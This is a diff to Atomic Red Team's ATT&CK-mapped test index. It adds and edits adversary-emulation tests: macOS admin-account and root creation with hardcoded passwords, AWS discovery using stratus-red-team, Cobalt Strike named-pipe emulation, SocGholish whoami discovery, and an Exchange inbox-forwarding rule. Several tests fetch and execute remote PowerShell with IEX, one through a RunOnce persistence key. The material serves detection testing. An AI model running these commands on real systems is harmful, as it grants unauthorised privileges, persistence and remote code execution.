+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -43339,6 +43464,45 @@ persistence:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
  T1574.012:
    technique:
      x_mitre_platforms:
@@ -55344,7 +55508,78 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
  T1217:
    technique:
      x_mitre_platforms:
@@ -67931,6 +68166,45 @@ initial-access:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
 exfiltration:
  T1567:
    technique:
@@ -27503,6 +27503,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -42069,7 +42070,7 @@ collection:
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
          Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
        cleanup_command: |
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -51289,6 +51290,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -27418,6 +27418,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51156,6 +51157,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -9717,7 +9717,7 @@ defense-evasion:
      description: Modify event viewer registry values to alter the behavior of the
        online help redirection. Upon opening an event in event viewer and attempting
        to view the help page for the event, it will execute the program defined in
-        thed redirection program registry entry.
+        the redirection program registry entry.
      supported_platforms:
      - windows
      input_arguments:
@@ -33011,7 +33011,7 @@ privilege-escalation:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -33061,7 +33061,8 @@ privilege-escalation:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -42210,7 +42211,158 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
  T1204.003:
    technique:
      x_mitre_platforms:
@@ -53421,7 +53573,7 @@ persistence:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -53471,7 +53623,8 @@ persistence:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -73558,6 +73711,36 @@ discovery:
          -FilePath .\\CurrentUserObject.txt\n"
        cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force

+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+
          '
        name: powershell
  T1613:
@@ -74088,10 +74271,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
          lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -74117,10 +74299,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc admincountdmp\n"
        name: command_prompt
@@ -74144,10 +74325,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=person)\n"
        name: command_prompt
@@ -74171,10 +74351,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc exchaddresses\n"
        name: command_prompt
@@ -74362,15 +74541,6 @@ discovery:
        code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
      supported_platforms:
      - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
      executor:
        command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
          C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
@@ -74842,6 +75012,7 @@ discovery:
          '
        get_prereq_command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -76064,6 +76235,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -76342,10 +76514,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=subnet)\n"
        name: command_prompt
@@ -76615,10 +76786,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
        name: command_prompt
@@ -76642,10 +76812,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -gcb -sc trustdmp\n"
        name: command_prompt
@@ -78427,10 +78596,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=computer)\n"
        name: command_prompt
@@ -78454,10 +78622,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc dclist\n"
        name: command_prompt
@@ -288,6 +288,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -149,6 +149,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -433,6 +433,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -479,6 +480,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -210,6 +210,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -234,6 +235,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -16,6 +16,8 @@ Various utilities and commands may acquire this information, including <code>who

 - [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)

+- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)
+

 <br/>

@@ -185,4 +187,54 @@ Remove-Item -Path .\CurrentUserObject.txt -Force



+<br/>
+<br/>
+
+## Atomic Test #6 - System Discovery - SocGholish whoami
+SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
